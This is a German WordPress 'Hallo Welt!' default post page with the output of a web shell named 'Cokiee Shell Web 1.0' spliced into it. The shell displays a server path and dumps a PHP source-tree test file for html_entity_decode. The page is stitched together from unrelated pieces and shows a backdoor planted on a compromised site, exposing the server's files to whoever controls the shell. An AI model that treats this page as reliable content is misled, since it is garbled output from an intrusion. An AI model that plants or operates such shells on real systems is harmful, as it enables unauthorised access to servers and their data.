Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/strings/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/strings/html_entity_decode1.phpt |
--TEST-- html_entity_decode: Decoding of entities after invalid entities --FILE-- <?php $arr = array( "&", "&&", "&$", "&#&", "&#$", "&#x&", "&#x$", "&", "$", " &", " $", "&", "$", "&", "$", "&a&", "&a$", "&aa&", "&aa$", "&aa;&", "&aa;$", "&;&", "&;$", ); $i = 0; foreach ($arr as $ent) { if ($i % 2 == 1) { if (($a = html_entity_decode($ent, ENT_QUOTES, 'UTF-8')) != ($b = htmlspecialchars_decode($ent, ENT_QUOTES))) { echo "htmlspecialchars_decode <-> html_entity_decode inconsistency","\n", "$b <-> $a","\n"; } } echo html_entity_decode($ent, ENT_QUOTES, 'UTF-8'), "\n"; } echo "Done.\n"; --EXPECT-- & && &$ &#& &#$ &#x& &#x$ & $  &  $ & $ & $ &a& &a$ &aa& &aa$ &aa;& &aa;$ &;& &;$ Done.
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare